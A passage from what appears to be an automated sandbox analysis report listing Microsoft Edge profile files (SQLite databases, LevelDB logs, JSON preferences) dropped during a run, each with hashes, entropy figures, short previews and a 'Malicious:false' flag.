                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c3e79d20-95f0-4db7-ada6-a080cfa1aabe.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d5b38317-81dd-4266-9fea-74be52c9abfb.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):428
                                                                                                                                                                                                                                                Entropy (8bit):5.234548376955389
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/k5N+vLZYebvqBZFUt8O/kHZ/+O/kBV54ZYebvqBaJ:7/JlYebvyg8O/qN/YoYebvL
                                                                                                                                                                                                                                                MD5:1556A3FF2A03F609296C3FF031BB8A47
                                                                                                                                                                                                                                                SHA1:9F66D455F03751109FEF35FEE1089673F52A60EC
                                                                                                                                                                                                                                                SHA-256:A2D14CC4A862495C816EA0A4EAF596B906E85F787EDC6C79AA8A58EC8FE28980
                                                                                                                                                                                                                                                SHA-512:58177C59CDBCFB6CE88C45BA7AE4D1D94860912A82D5A71D02EC0FC24E9D8B47F2C0BF568CC74EA394480869E5A1F5B7CF44BA53A1B81BB1BA3C4F0DEF88323A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:45.370 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/16-11:07:45.372 1b0c Recovering log #3.2024/12/16-11:07:45.376 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):428
                                                                                                                                                                                                                                                Entropy (8bit):5.234548376955389
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/k5N+vLZYebvqBZFUt8O/kHZ/+O/kBV54ZYebvqBaJ:7/JlYebvyg8O/qN/YoYebvL
                                                                                                                                                                                                                                                MD5:1556A3FF2A03F609296C3FF031BB8A47
                                                                                                                                                                                                                                                SHA1:9F66D455F03751109FEF35FEE1089673F52A60EC
                                                                                                                                                                                                                                                SHA-256:A2D14CC4A862495C816EA0A4EAF596B906E85F787EDC6C79AA8A58EC8FE28980
                                                                                                                                                                                                                                                SHA-512:58177C59CDBCFB6CE88C45BA7AE4D1D94860912A82D5A71D02EC0FC24E9D8B47F2C0BF568CC74EA394480869E5A1F5B7CF44BA53A1B81BB1BA3C4F0DEF88323A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:45.370 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/16-11:07:45.372 1b0c Recovering log #3.2024/12/16-11:07:45.376 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                Entropy (8bit):5.217873365854551
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/dIOq2PcNwi23oH+TcwtpIFUt8O/rvZZmw+O/rvzkwOcNwi23oH+Tcwta/WLJ:7/HvLZYebmFUt8O/rh/+O/r754ZYebaQ
                                                                                                                                                                                                                                                MD5:D7B9A4D2A07C6DEF3617A9B9A98F213F
                                                                                                                                                                                                                                                SHA1:C663E76286CBB65BD7FA6F141B972A7A814AE2DD
                                                                                                                                                                                                                                                SHA-256:D20851092D794C2EEB4FB4EFEEA5FA10E4967AE831200D69A4232C2F8A4C2FA5
                                                                                                                                                                                                                                                SHA-512:782309F34D2CB6DC49280068E00FB5167D3624AA847AFD39BDC376AB407DD31E4A9632E1FC6C8A9ECC62AC42F28A84E180C5738A389623DFEFE34853307D3BF0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.729 15e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/16-11:07:26.755 15e0 Recovering log #3.2024/12/16-11:07:26.755 15e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                Entropy (8bit):5.217873365854551
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/dIOq2PcNwi23oH+TcwtpIFUt8O/rvZZmw+O/rvzkwOcNwi23oH+Tcwta/WLJ:7/HvLZYebmFUt8O/rh/+O/r754ZYebaQ
                                                                                                                                                                                                                                                MD5:D7B9A4D2A07C6DEF3617A9B9A98F213F
                                                                                                                                                                                                                                                SHA1:C663E76286CBB65BD7FA6F141B972A7A814AE2DD
                                                                                                                                                                                                                                                SHA-256:D20851092D794C2EEB4FB4EFEEA5FA10E4967AE831200D69A4232C2F8A4C2FA5
                                                                                                                                                                                                                                                SHA-512:782309F34D2CB6DC49280068E00FB5167D3624AA847AFD39BDC376AB407DD31E4A9632E1FC6C8A9ECC62AC42F28A84E180C5738A389623DFEFE34853307D3BF0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.729 15e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/16-11:07:26.755 15e0 Recovering log #3.2024/12/16-11:07:26.755 15e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                Entropy (8bit):1.265218452828871
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMCSAELyKOMq+8HKkjucswRv8p3nVumH:K0q+n0JC9ELyKOMq+8HKkjuczRv89D
                                                                                                                                                                                                                                                MD5:7C249851A2911B3A022EAC881865A7B5
                                                                                                                                                                                                                                                SHA1:CAF47563F78974C64F0F7265F3647C199B1AD8A5
                                                                                                                                                                                                                                                SHA-256:77B59D9F995AC8D2674E3CF9799A069AB6DBFEA8AD431D06CF1820946F0C767D
                                                                                                                                                                                                                                                SHA-512:DD78A3338802BEB75F4AABC0F216612E03E69C29C0FB1A7E69AF1C7ACBB7DA50E81BFDF4B3A5967D5A7536BFC95665CEDB633ECF2E2E3BB27CBE9BBDDD2FCFDB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                Entropy (8bit):0.46689783847520633
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBJ8h:v7doKsKuKZKlZNmu46yjxKh
                                                                                                                                                                                                                                                MD5:77936444174CCB2BFE0208862CC0C4F4
                                                                                                                                                                                                                                                SHA1:B878E0DED42E1EBF23AA14F674289F823AD3F178
                                                                                                                                                                                                                                                SHA-256:225D9618889093F2E4E0748F0934808E0B1FDE4CCE484B7F6C3036ECE394E9E4
                                                                                                                                                                                                                                                SHA-512:3F7029E71EE97540661311214C4A72EA6E87F1A28B10BF2F9CE95492A7236582C95EC15EF5E7D9F2DA3C30F3341E4C2113294905D39A31A8908848EC70F76F72
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d5968ead-0982-4a3d-9bcb-2afdf18fa346.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9682
                                                                                                                                                                                                                                                Entropy (8bit):5.108504244397563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdkdpbsH7RyaNP9k7Se8VpbV+Fa2QAwT+PHYJ:stdQbsHltJjbGLQxr
                                                                                                                                                                                                                                                MD5:FE7B66572E64EEF775CAC92773270830
                                                                                                                                                                                                                                                SHA1:3608D9E229490604B724DA267A3AC4E70906ACA5
                                                                                                                                                                                                                                                SHA-256:473DED48B8E775A0A4757361B6A4DC2C3D962AC9540140D050A18733080B1458
                                                                                                                                                                                                                                                SHA-512:2BEB82B93A0DDAC97C76D3FA045DEEA148D17F6EEEBD02E819865BA523745926D273B0E17EA8D5DE4A3CFDE6BF27398208C527C1FB8DD2E7E86ECD328AD1D416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                Entropy (8bit):0.10281752965116953
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:+yBIIl3yBQspEjVl/PnnnnnnnnnnnvoQ/Eou:+y+wynoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                MD5:18350ECEFBCDF33A0E80E6DFCE78CF97
                                                                                                                                                                                                                                                SHA1:0BA6462FF8341DC5F170B9D5652976DB4A8DAE0A
                                                                                                                                                                                                                                                SHA-256:37039B07596ADD408FFA90204DA6F2014477BF705710C46DF1AA80F58CEC8459
                                                                                                                                                                                                                                                SHA-512:DA87ECBFFD5ECD518EB7767E563D5B0A0585A1381532C77E3C9A18E16F2F82B64B92B27045EB60C86513AB9B7A2FB8C106FACFC6C009EBAEC7014C88AD9B34CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..-.............M.......zj..._73.-.....V..E..$...-.............M.......zj..._73.-.....V..E..$.........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                                                                                                Entropy (8bit):0.8875544868111808
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:5M2rw718MME5FCCfG1VJSJ91DJv8vydy2iCyKy8zQyTxyJI:U57
                                                                                                                                                                                                                                                MD5:A9029D0B8DC635AC62666D13EB841F1C
                                                                                                                                                                                                                                                SHA1:7EBB02C6993ED82A80415A185EBD505E86F433E3
                                                                                                                                                                                                                                                SHA-256:3846386C2AC1FC98D770A30C07E31E2CB92C15AC9A76F53690046EE0D5A39B47
                                                                                                                                                                                                                                                SHA-512:C066144B5AC55F93B95C3D1BA20AF6A228443EE34F39FC3C6D0E43BFDC88DCBEAC2810BA615C4322EDDF4F658C9CAFB6693744E66C3E29A8F359D2DA1933DE6D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):485
                                                                                                                                                                                                                                                Entropy (8bit):4.037793661135485
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuh9illFtHOOfIjUPsedhO8:llc8BOuuuuuuuuuuhgll3S8x
                                                                                                                                                                                                                                                MD5:9C8E29FD9910ADFE4325180F72E2FA1D
                                                                                                                                                                                                                                                SHA1:52029EF56915A58870A4241FD3B022E7FF7783FB
                                                                                                                                                                                                                                                SHA-256:2FFAD5BC9802332CF6BDFCC76F2B99AD7250493A5CB13358DBC128676E864288
                                                                                                                                                                                                                                                SHA-512:54ECE3D1678D9569D14B3449D8BC299886D040FF688F1DDB19D4BD2B3456C46A5AD26BB64E11ACD6D0704301BC69C9FA90997EBB182BF7877E831F237AB72C0A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................Q;...............#38_h.......6.Z..W.F.....p.E.....p.E..........V.e................V.e....................0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.2492635066046125
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/vt+q2PcNwi23oH+TcwtfrK+IFUt8O/bZmw+O/XYVkwOcNwi23oH+TcwtfrUeLJ:7/vovLZYeb23FUt8O/b/+O/XQ54ZYeb5
                                                                                                                                                                                                                                                MD5:96072FD57C0A5011B047959D409CC39F
                                                                                                                                                                                                                                                SHA1:2FEE9999626743A0F16A63ABDDEC6A121197FA09
                                                                                                                                                                                                                                                SHA-256:9EBFF41B956848DFD67698582C3F0F34BDD2FEF8925DA53FA53BEB25B0EC47C9
                                                                                                                                                                                                                                                SHA-512:A6CEB61D826F6534C1DEB73C42BAD871039EE71A8F371CFF5FC718CF42942E69E24AA086CD562A3B7A300BDE8F2493352389A0DDD6C6EE28533CC171B0E0DBD1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.382 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/16-11:07:27.384 16e8 Recovering log #3.2024/12/16-11:07:27.385 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.2492635066046125
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/vt+q2PcNwi23oH+TcwtfrK+IFUt8O/bZmw+O/XYVkwOcNwi23oH+TcwtfrUeLJ:7/vovLZYeb23FUt8O/b/+O/XQ54ZYeb5
                                                                                                                                                                                                                                                MD5:96072FD57C0A5011B047959D409CC39F
                                                                                                                                                                                                                                                SHA1:2FEE9999626743A0F16A63ABDDEC6A121197FA09
                                                                                                                                                                                                                                                SHA-256:9EBFF41B956848DFD67698582C3F0F34BDD2FEF8925DA53FA53BEB25B0EC47C9
